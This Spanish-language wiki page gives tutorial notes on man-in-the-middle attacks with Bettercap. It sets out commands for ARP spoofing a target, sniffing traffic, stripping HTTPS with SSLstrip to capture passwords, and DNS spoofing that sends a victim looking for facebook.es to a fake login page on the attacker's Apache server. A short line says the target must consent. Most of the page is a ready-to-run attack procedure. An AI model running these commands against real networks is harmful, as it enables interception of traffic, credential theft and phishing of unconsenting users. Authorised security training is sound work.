😎Man in the middle
Un ataque de "man in the middle" (MITM) es un tipo de ataque en el que un atacante intercepta la comunicación entre dos partes para ver, modificar o manipular el tráfico de red en tiempo real.
Nota: Este tipo de técnicas son muy invasivas, ya que vamos a interceptar el tráfico de red del objetivo, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
En un ataque MITM, el atacante puede interceptar la comunicación entre dos partes, como un usuario y un servidor web, y suplantar a ambas partes para obtener información confidencial, como credenciales de inicio de sesión, datos bancarios, información personal o incluso contenido en línea. El atacante también puede manipular el tráfico de red para redirigir a las víctimas a sitios web maliciosos o para realizar ataques de phishing.
Un ataque MiTM ocurre cuando un ciberdelincuente toma el control de un dispositivo sin que el usuario lo sepa. Con ese nivel de acceso, el atacante puede interceptar y capturar información sobre el usuario antes de retransmitirla a su destino. Estos tipos de ataques se utilizan a menudo para robar información financiera.
Hay muchos tipos de malware que poseen capacidades de ataque MiTM.
Ver dispositivos en nuestra red local
sudo arp-scan -I eth0 --localnetBettercap
Bettercap es una de las mejores herramientas para la realización de ataques de suplantación de identidad, ataques MITM, análisis de protocolos y análisis de tráfico de red. Es compatible con Windows, Linux y macOS.
Empleo
sudo bettercap
helpVemos los módulos que están corriendo
bettercap
Inicia Bettercap
set interface wlan0
Establece la interfaz de red (sustituye wlan0)
net.show
Muestra información sobre la red
net.probe on
Inicia el escaneo de hosts en la red
set target 192.168.0.1
Establece un objetivo específico en la red
arp.spoof on
Inicia un ataque de envenenamiento ARP
net.sniff on
Inicia la captura de paquetes en la red
set http.proxy.sslstrip true
Habilita SSLstrip para ataques MITM en HTTP
set dns.spoof.domains example.com
Establece dominios DNS falsos para spoofing
set net.sniff.verbose true
Muestra información detallada en la captura de red
set autopwn.target all
Selecciona todos los objetivos para el autopwn
autopwn on
Inicia el ataque autopwn
help
Muestra la ayuda y la lista de comandos
exit
Sale de Bettercap
Ver dispositivos en la red
net.probe on
ticker on
Vamos a necesitar la IP de la máquina conectada a nuestra red.
ARP Spoofing
Sirve para ponerse en medio de la comunicación entre la víctima y internet. Para este ejemplo vamos a usar un equipo víctima Windows:
arp -a
tracert www.google.com 
sudo bettercap
set arp.spoof.targets {IP-TARGET}
arp.spoof on
Ver todo el tráfico de la red en Bettercap
set net.sniff.verbose false net.sniff onCapturar contraseñas con cobertura de proxy https
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets {IP-TARGET}
arp.spoof.fullduplex true
arp.spoof on
http.proxy on
net.sniff onSniffing con WireShark
Una vez iniciado el ARP Spoofing podríamos monitorear todo el tráfico de red del objetivo, capturando las peticiones HTTP con WireShark
DNS Spoofing
Sirve por ejemplo para crear una pagina falsa donde un usuario al loguearse deje sus datos de login y contraseña. La página web falsa se alojará en nuestro localhost de Kali Linux
1. Arrancar servidor Apache
sudo service apache2 restartBuscar en el navegador -> localhost
2. Sustituir página de index en localhost
En nuestro Kali Linux:
cd /var/www/html
sudo rm index.html
echo “<h1> Visitando la página web del atacante</h1> > index.htmlAquí podemos meter la página html que queramos.
3. Iniciar el DNS Spoofing
sudo bettercap
set arp.spoof.targets {IP-TARGET}
arp.spoof on
set dns.spoof
set dns.spoof.domains facebook.es # O cualquier pagina web que queramos suplantar
set dns.spoof adress {IP-ATACANTE}
dns.spoof onUna vez que la víctima acceda a facebook.com accederá a nuestro página fake.
Última actualización
¿Te fue útil?